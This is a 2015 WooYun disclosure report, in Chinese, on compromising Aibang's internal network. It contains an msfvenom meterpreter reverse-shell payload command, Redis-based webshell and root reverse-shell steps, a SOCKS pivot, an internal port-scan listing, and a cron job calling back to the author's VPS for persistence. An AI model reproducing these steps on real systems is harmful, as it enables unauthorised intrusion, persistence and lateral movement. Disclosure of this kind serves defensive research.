当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157559

漏洞标题:漫游爱帮网内网可控制多台服务器(多处安全隐患综合利用)

相关厂商:爱帮网

漏洞作者: 海绵宝宝

提交时间:2015-12-02 11:34

修复时间:2016-01-18 16:30

公开时间:2016-01-18 16:30

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-02: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

详细说明:

0x1 Getshell
通过扫描,发现
crm.aibang.com (60.28.211.171)
在6379端口开放redis服务,未经过授权即可进行操作。
通过弱点扫描,发现
http://60.28.211.171/phpinfo.php
得知web路径为/home/abui/htdocs/
利用redis写入webshell。

1.png


2.png


还发现了前人的痕迹。

111.png


0x2 进内网
查看网络信息.
/sbin/ifconfig

4.png


[4]
查看 /etc/hosts ,发现内网网段是在192.168.2.1/24。

3.jpg


把本机代理进内网。
① 通过http service的代理
webshell非root权限,对web目录无写权限。失败。
②通过meterpreter的代理功能
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4949 -f elf > shell

6.jpg


使用 auxiliary/server/socks4a,未成功。
使用 auxiliary/scanner/portscan/tcp 扫描端口。效果不好,经常掉线,放弃。

5.jpg


③使用 sockes5.py
在目标机上运行sockes5.py,本机通过proxychains4成功代理进入内网。
0x3 扩大战果
进入内网后,本相使用nmap来进行扫描,在Mac OS X 10.11下,proxychains4通过命令行使用会出现问题,在mac os进入系统恢复模式,终端输入csrutil disable才能在命令行使用。
但是通过proxychains4使用nmap –sT -Pn 的时候,出现扫描不出端口开放信息的情况。放弃使用nmap。
自己写个python脚本,通过socket判断端口是否开放。
部分ip端口开放信息。

192.168.2.1
Open:[3306, 22]
192.168.2.2
Open:[22, 6379]
192.168.2.4
Open:[22]
192.168.2.5
Open:[3306, 22]
192.168.2.6
Open:[22]
192.168.2.8
Open:[3306, 22]
192.168.2.9
Open:[80, 22, 8080]
192.168.2.10
Open:[80, 3306, 22, 6379]
192.168.2.11
Open:[22]
192.168.2.12
Open:[80, 22, 8080]
192.168.2.13
Open:[80, 22, 8080]
192.168.2.14
Open:[80, 22, 8080]
192.168.2.15
Open:[22]
192.168.2.16
Open:[22]
192.168.2.18
Open:[22]
192.168.2.19
Open:[22]
192.168.2.20
Open:[80, 22, 8080, 6379]
192.168.2.21
Open:[22]
192.168.2.22
Open:[22]
192.168.2.23
Open:[22]
192.168.2.24
Open:[22]
192.168.2.25
Open:[80, 3306, 22, 8080]
192.168.2.26
Open:[3306, 22]
192.168.2.27
Open:[3306, 22]
192.168.2.28
Open:[80, 22, 8080, 6379]
192.168.2.29
Open:[22]
192.168.2.30
Open:[22]
192.168.2.31
Open:[22]
192.168.2.32
Open:[22]
192.168.2.33
Open:[22]
192.168.2.34
Open:[3306, 22, 8080]
192.168.2.35
Open:[22]
192.168.2.37
Open:[3306, 22]
192.168.2.38
Open:[22]
192.168.2.39
Open:[80, 22, 8080]
192.168.2.40
Open:[3306, 22]
192.168.2.41
Open:[3306, 22]
192.168.2.42
Open:[80, 22, 8080]
192.168.2.43
Open:[22]
192.168.2.44
Open:[80, 22, 8080]
192.168.2.45
Open:[80, 22, 8080, 6379]
192.168.2.47
Open:[22, 6379]
192.168.2.46
Open:[6379]
192.168.2.48
Open:[3306, 22, 6379]
192.168.2.49
Open:[3306, 22, 6379]
192.168.2.50
Open:[80, 3306, 22]
192.168.2.51
Open:[80, 22]
192.168.2.61
Open:[3306, 22]
192.168.2.64
Open:[3306, 22]
192.168.2.66
Open:[80, 22, 8080]
192.168.2.68
Open:[80, 22, 8080]
192.168.2.75
Open:[22]
192.168.2.76
Open:[22]
192.168.2.77
Open:[22]
192.168.2.78
Open:[22]
192.168.2.79
Open:[22]
192.168.2.80
Open:[22]
192.168.2.81
Open:[22]
192.168.2.82
Open:[22]
192.168.2.83
Open:[22]
192.168.2.84
Open:[22]
192.168.2.85
Open:[22]
192.168.2.86
Open:[22]
192.168.2.87
Open:[22]
192.168.2.88
Open:[22]
192.168.2.89
Open:[80, 22, 8080]
192.168.2.90
Open:[22]
192.168.2.93
Open:[80, 3306, 22]
192.168.2.94
Open:[80, 22, 8080]
192.168.2.95
Open:[22]
192.168.2.96
Open:[80, 22, 8080]
192.168.2.100
Open:[22, 6379]
192.168.2.101
Open:[80, 22, 8080]
192.168.2.102
Open:[3306, 22]
192.168.2.103
Open:[80, 22, 8080]
192.168.2.104
Open:[80, 3306, 22]


对开放6379端口的服务器,嘿嘿嘿。
搞定了.反弹shell,直接root权限.
192.168.2.10
192.168.2.28 放弃之前写入的webshell,直接反弹shell,root权限。
192.168.2.20
192.168.2.45
192.168.2.46
192.168.2.47
192.168.2.48
192.168.2.49
192.168.2.100
写入计划任务,定时反弹shell到我vps上。

漏洞证明:

部分证明

444.jpg


a.jpg

b.jpg


c.jpg


d.jpg


f.jpg


g.jpg

h.jpg

修复方案:

redis啊

版权声明:转载请注明来源 海绵宝宝@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-04 16:24

厂商回复:

感谢!

最新状态:

暂无